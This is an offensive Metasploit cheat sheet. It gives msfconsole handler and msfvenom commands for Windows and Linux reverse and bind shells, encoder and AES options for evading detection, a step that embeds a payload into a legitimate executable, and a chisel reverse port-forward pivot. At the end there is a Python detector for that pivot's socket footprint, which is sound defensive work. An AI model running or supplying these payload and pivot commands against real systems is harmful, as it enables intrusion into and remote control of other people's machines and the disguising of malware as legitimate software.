Metasploit

Handler C2 Meterpreter

msfconsole -x "use exploit/multi/handler;set payload windows/meterpreter/reverse_tcp;set LHOST <listening_host>;set LPORT <listening_port>;run;"

Payload Windows

Reverse Shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=<Your Port> -f exe > reverse.exe

Bind Shell

msfvenom -p windows/meterpreter/bind_tcp RHOST=<IP Address> LPORT=<Your Port> -f exe > bind.exe

Payload Linux

Reverse Shell

msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=<IP Address> LPORT=<Your Port> -f elf > reverse.elf
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP Address> LPORT=<Your Port> -f elf > shell.elf

Bind Shell

msfvenom -p linux/x86/meterpreter/bind_tcp RHOST=<IP Address> LPORT=<Your Port> -f elf > bind.elf

Metasploit Encoder

msfvenom --list encoders

# x86/shikata_ga_nai
# x86 reverse shell
sudo msfvenom -p windows/meterpreter/reverse_https LHOST=10.10.x.y LPORT=443 -e x86/shikata_ga_nai -f exe -o shell.exe

# x64
sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.x.y LPORT=443 -e x64/zutto_dekiru -f exe -o shell64.exe

# patch the legit exe with payload

sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.x.y LPORT=443 -e <encoder> -x <legit exe> -f exe -o shell_legit.exe

msfvenom --list encrypt

sudo msfvenom -p windows/x64/meterpreter/reverse_https LHOST=10.10.x.y LPORT=443 --encrypt aes256 --encrypt-key <the key> -f exe -o shell_aes.exe

Metasploit Reverse Payload through a Reverse Port-Forward (chisel)

tunnel reference:

Compromised Machine

./chisel server --reverse --port 8000

Kali Linux

format: chisel client <server chisel>:<port> R:<port opened on compromised machine>:127.0.0.1:<handler port on Kali>

chisel client 192.168.11.4:8000 R:50001:127.0.0.1:443

Generate Payload:

set LHOST to the compromised machine's IP address that the target machine can reach, and LPORT to the port chisel opened there (50001 in this example).

msfvenom -p windows/x64/meterpreter/reverse_https LHOST=192.168.56.107 LPORT=50001 -f exe > proxy_payload.exe

Handler C2 Meterpreter:

because the tunnel forwards directly to loopback on Kali, make sure the handler's LHOST is also loopback (127.0.0.1)

sudo msfconsole -x "use exploit/multi/handler;set payload windows/x64/meterpreter/reverse_https;set LHOST 127.0.0.1;set LPORT 443;run;"
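From the defender's side, the pivot above leaves a recognisable socket footprint on the compromised machine: one process (chisel) holds the control listener on 8000, the accepted connection from Kali, and a brand-new listener on 50001 that is not part of the host's baseline. The following detector is an added example, not code from the original cheat sheet or from the chisel or Metasploit projects; it parses `ss -tanp`-style lines (the sample is constructed, not captured, and the baseline set of expected ports is an assumption) and flags any process that owns both an established connection and a listener on a non-baseline port.

```python
"""Flag the socket pattern a reverse port-forward leaves on a pivot host.

Added example; the ss output below is constructed and the baseline is an
assumed per-host allowlist of expected listening ports.
"""
import re
from collections import defaultdict

# Constructed sample of `ss -tanp` output on the pivot host (assumption: the
# last column follows iproute2's users:(("name",pid=N,fd=M)) layout).
SAMPLE_SS_OUTPUT = """\
LISTEN 0 128   0.0.0.0:22        0.0.0.0:*           users:(("sshd",pid=812,fd=3))
LISTEN 0 4096  *:8000            *:*                 users:(("chisel",pid=4242,fd=7))
ESTAB  0 0     192.168.11.4:8000 192.168.11.10:51234 users:(("chisel",pid=4242,fd=8))
LISTEN 0 4096  *:50001           *:*                 users:(("chisel",pid=4242,fd=9))
ESTAB  0 0     192.168.11.4:22   192.168.11.20:40000 users:(("sshd",pid=9001,fd=4))
"""

# Listening ports expected on this host (assumption: site-specific baseline).
BASELINE_LISTEN_PORTS = {22}

SOCK_RE = re.compile(
    r'^(?P<state>\S+)\s+\d+\s+\d+\s+(?P<local>\S+)\s+(?P<peer>\S+)\s+'
    r'users:\(\("(?P<proc>[^"]+)",pid=(?P<pid>\d+),fd=\d+\)\)'
)


def parse_ss(text):
    """Yield one dict per socket line that matches the ss layout."""
    for line in text.splitlines():
        m = SOCK_RE.match(line.strip())
        if not m:
            continue  # header or unparseable line
        rec = m.groupdict()
        rec["pid"] = int(rec["pid"])
        # rsplit keeps IPv6 forms such as [::]:8000 intact
        rec["local_port"] = int(rec["local"].rsplit(":", 1)[1])
        yield rec


def find_reverse_forward_candidates(text, baseline=BASELINE_LISTEN_PORTS):
    """Return {pid: finding} for processes that own at least one established
    connection AND at least one listener on a port outside the baseline.

    A reverse forward (chisel `R:` above) produces exactly that shape: the
    inbound control session and the newly bound forward port share one pid.
    """
    by_pid = defaultdict(lambda: {"proc": None, "listen": set(), "estab": 0})
    for s in parse_ss(text):
        entry = by_pid[s["pid"]]
        entry["proc"] = s["proc"]
        if s["state"] == "LISTEN":
            entry["listen"].add(s["local_port"])
        elif s["state"] == "ESTAB":
            entry["estab"] += 1

    findings = {}
    for pid, e in by_pid.items():
        unexpected = e["listen"] - set(baseline)
        if unexpected and e["estab"] >= 1:
            findings[pid] = {
                "proc": e["proc"],
                "unexpected_listen": sorted(unexpected),
                "established": e["estab"],
            }
    return findings


if __name__ == "__main__":
    for pid, f in find_reverse_forward_candidates(SAMPLE_SS_OUTPUT).items():
        print(f"pid {pid} ({f['proc']}): non-baseline listeners "
              f"{f['unexpected_listen']}, established connections {f['established']}")
```

Run against the constructed sample it reports only pid 4242 (chisel) with listeners 8000 and 50001; sshd is ignored because its listener is in the baseline and its accepted session belongs to a separate child pid. On a real host the baseline would come from an inventory rather than a hard-coded set, and the same grouping logic works over periodic `ss` snapshots to catch the forward port appearing after the control connection.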

reference:

https://medium.com/@techmindxperts/complete-guide-to-metasploit-from-installation-to-exploit-development-eb89a507c07d

https://book.hacktricks.xyz/generic-methodologies-and-resources/reverse-shells/msfvenom
